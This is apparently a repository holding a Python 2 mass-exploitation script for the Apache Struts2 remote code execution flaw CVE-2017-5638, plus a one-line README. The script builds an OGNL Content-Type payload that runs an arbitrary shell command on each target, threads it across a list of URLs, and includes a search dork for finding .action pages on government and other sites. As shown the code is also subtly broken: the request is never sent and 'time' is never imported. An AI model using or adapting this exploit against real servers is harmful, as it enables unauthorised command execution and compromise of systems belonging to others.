├── CVE-2017-5638.py
└── README.md


/CVE-2017-5638.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | # Modded Apache Struts2 RCE Exploit v2 CVE-2017-5638 AUTO EXPLOITER | 
 3 | # Dork: "site:com filetype:action"
 4 | # site example^: org,net,egu,gov,io,pw
 5 |  
 6 | import urllib2
 7 | import httplib
 8 | import sys, re, os
 9 | from threading import Thread
10 |  
11 | strutz = open(sys.argv[1], "r").readlines()
12 | cmd = "" # COMMAND HERE Arch(s): x86, i686
13 |  
14 | def exploit(url, cmd):
15 |     #page = ''
16 |     payload = "%{(#_='multipart/form-data')."
17 |     payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
18 |     payload += "(#_memberAccess?"
19 |     payload += "(#_memberAccess=#dm):"
20 |     payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
21 |     payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
22 |     payload += "(#ognlUtil.getExcludedPackageNames().clear())."
23 |     payload += "(#ognlUtil.getExcludedClasses().clear())."
24 |     payload += "(#context.setMemberAccess(#dm))))."
25 |     payload += "(#cmd='%s')." % cmd
26 |     payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
27 |     payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
28 |     payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
29 |     payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
30 |     payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
31 |     payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
32 |     payload += "(#ros.flush())}"
33 |     try:
34 |         url = ''.join(url)
35 |         if "http://" not in url:
36 |             url = "http://"+url
37 |         elif "https://" in url:
38 |             url = url.replace("https://", "http://")
39 |         headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
40 |         request = urllib2.Request(url, headers=headers)
41 |         print "\033[32mPayload Sent!"
42 |         #page = urllib2.urlopen(request).read()
43 |     except httplib.IncompleteRead, e:
44 |         pass
45 |     except KeyboardInterrupt:
46 |         pass
47 |     except Exception:
48 |         pass
49 |     #print "\n\033[35m%s"%(page)
50 |  
51 |  
52 | for url in strutz:
53 |     try:
54 |         l33t = Thread(target=exploit, args=(url,cmd,))
55 |         l33t.start()
56 |         time.sleep(0.09)
57 |     except:
58 |         pass
59 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Modded-Apache-Struts2-RCE-Exploit-v2-CVE-2017-5638-AUTO-EXPLOITER


--------------------------------------------------------------------------------